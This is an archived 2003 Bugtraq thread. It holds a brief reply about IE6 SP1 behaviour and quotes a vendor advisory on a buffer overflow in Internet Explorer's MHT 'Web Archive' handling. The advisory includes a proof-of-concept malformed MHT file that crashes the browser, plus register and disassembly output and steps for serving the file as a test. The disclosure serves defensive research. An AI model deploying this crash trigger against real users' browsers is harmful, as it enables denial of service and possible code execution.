lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <001901c2e807$3d5ebff0$0200000a@pluto>
Date: Tue, 11 Mar 2003 20:48:51 +0100
From: "jelmer" <jelmer@...erus.xs4all.nl>
To: "Tom Tanaka" <tomatell@...on-sol.jp>, <bugtraq@...urityfocus.com>
Subject: Re: .MHT Buffer Overflow in Internet Explorer


I believe from ie6 SP1 on IE doesn't open any mht files directly from the
web anymore.
from the local filesystem it still works though.


----- Original Message -----
From: "Tom Tanaka" <tomatell@...on-sol.jp>
To: <bugtraq@...urityfocus.com>
Sent: Monday, March 10, 2003 5:30 AM
Subject: .MHT Buffer Overflow in Internet Explorer


>
>
> CANON SYSTEM SOLUTIONS INC. Security Alert
>
> VULNERABILITY:.MHT Buffer Overflow in Internet Explorer
>
> DATE FOUND:March 2, 2003
>
> Severity:High Risk(code can be executed remotely)
> ==========================================================================
> ====
> SUMMARY:
>
> IE5 introduced the new 'Web Archive' format for storing web pages, which
> have the extension MHT. The 'Web Archive' saves a web page as a single
> document complete with all images. The format is a standard
> mime/multipart e-mail message, a mime decoding program such as 7bit, 8bit
> and Base 64 decoder should be able to turn it into something usable with
> your OS and browser of choice.
>
> This format is pretty nifty and usable, however, there is a potential
> security breach found when used with encoded executable along with
> malformed MIME header in the 'Web Archive'. If the encode data is
> executable or has a single word "MZP" encoded within and Content-Type is
> not designated, IE5 will be terminated by critical buffer
> overflow.Consequently, one could compromise the client pc by executing
> malicious code in the memory.
> ==========================================================================
> ====
> AFFECTED SYSTEM:
>
> Microsoft Internet Explorer 5.5 and 6.0; prior versions are not
> vulnerable.
> ==========================================================================
> ====
> ANALYSIS:
>
> RFC822 describes the structure of message header used for the MIME. The
> followings are some of the identifiers defined for the MIME header.
>
> &#12288;MIME-Version:
> &#12288;Content-Type:
> &#12288;Content-Trasfer-Encoding:
> &#12288;Content-ID:
> &#12288;Content-Description:
>
> The 'Content-Type' is used for defining the types of media transfered.
> The 'Web Archive' format utilizes the Multipart/Related content-type
> (defined in RFC2387) to properly embed the multiple web content files. As
> described in RFC2387, the Multipart/Related content-type provides a
> common mechanism for representing objects that are aggregates of related
> MIME body parts. When tranferring html or plain text data encoded in
> the 'Web Archive', IE5 interprets as a plain text with 'carriage return'
> code(0D0A) , otherwise as binary data without 'carriage return' code
> (0D0A). By manipulating the MIME header structure and the Base64 encoded
> data as an executable,4 bytes of memory can be overwritten.
>
>
> PROOF OF CONCEPT:
>
> The following format is usually used for the Web Archive.
> ----------------------------------------------
> From: <Saved from Microsoft Internet Explorer 5>
> Subject: =?iso-2022-jp?B?
> GyRCJT0lVSVIJSYlJyUiJVclbSVAJS8lSBsoQiBIb21lUGFnZQ==?=
> Date: Tue, 4 Mar 2003 02:16:23 +0900
> MIME-Version: 1.0
> Content-Type: multipart/related;
> boundary="----=_NextPart_000_0000_01C2E1F4.0D559EA0";
> type="text/html"
> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
>
> This is a multi-part message in MIME format.
>
> ------=_NextPart_000_0000_01C2E1F4.0D559EA0
> Content-Location:file:///tomatell.exe
> Content-Transfer-Encoding: base64
>
> TVpQ
> ----------------------------------------------
>
>
> The following sample format contains malformed MIME header along with the
> Base64 encoded executable.
> ----------------------------------------------
> MIME-Version: 1.0
> ------=_NextPart_000_0000_01C2E1F4.0D559EA0
> Content-Location:file:///tomatell.exe
> Content-Transfer-Encoding: base64
>
> TVpQ
> ----------------------------------------------
>
> Note that the encoded string, "TVpQ", is the Win32 EXE signature located
> at the first three bytes of the EXE header. This is for the Win32 system
> to identify the data as a Win32 executable file. IE5 somehow reads this
> signature and interprets the data as an executable whereas the MIME
> encoder/decoder module,'inetcomm.dll', decodes as a plain 7 or 8 bit text
> data. Thus, IE5 creates a stream with a smaller buffersize than that of
> Base64 decoder has.
>
>
> The following error will occur when the above file is browsed by IE5.
>
> Unhandled exception in iexplore.exe: 0xC0000005: Access Violation.
>
>
>
> By debugging through the crash dump, the exception error is generated at
> the EIP(32-bit Instruction Pointer)=74CF497E called from inetcomm.dll to
> Kernel32.
>
> Register
> EAX = 00000000 EBX = 05AD3A20 ECX = 001FE074 EDX = 001FE190
> ESI = 05AD39D8 EDI = 00000000 [EIP = 74CF497E] ESP = 0607B2BC
> EBP = 0607B2FC EFL = 00000246
>
>
> \KernelObjects\CritSecOutOfMemoryEvent
>
> 74cf494c ff157412cd74       call    dword ptr
> [KERNEL32.EnterCriticalSection]
> 74cf4952 834e3c02           or      dword ptr [esi+3c],+02
> 74cf4956 33ff               xor     edi,edi
> 74cf4958 397e1c             cmp     dword ptr [esi+1c],edi
> 74cf495b 743f               jz      74cf499c
> 74cf495d 397c2410           cmp     dword ptr [esp+10],edi
> 74cf4961 8bce               mov     ecx,esi
> 74cf4963 7d06               jnl     74cf496b
> 74cf4965 ff742410           push    dword ptr [esp+10]
> 74cf4969 eb25               jmp     short 74cf4990
>
> 74cf496b c746441f000000     mov     dword ptr [esi+44],0000001f
> 74cf4972 e888f3ffff         call    74cf3cff
> 74cf4977 3bc7               cmp     eax,edi
> 74cf4979 7c12               jl      74cf498d
> 74cf497b 8b461c             mov     eax,dword ptr [esi+1c]
> 74cf497e 8b08               mov     ecx,dword ptr [eax] //Exception
>
>
> You could test the vulnerablity by copying above exploit to a file with
> an extention ".mht" and place it at the default root directory of IIS web
> server and set it as a default html of the server.
>
> WORKAROUND:
> Currently none available.
>
> Credit:
> Tom Tanaka
>
> /_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
>  Tom Tanaka <tomatell@...on-sol.co.jp>
>  Technical Manager, Security
>  Software Products Department
>  Tokyo Office
>  CANON SYSTEM SOLUTIONS INC..
>  1-2-18 Ikenohata Taito-ku, Tokyo 110-0008, Japan
>  Ph.:  +81-3-5815-7243
>  Fax : +81-3-5815-7262
> /_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
>
>
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ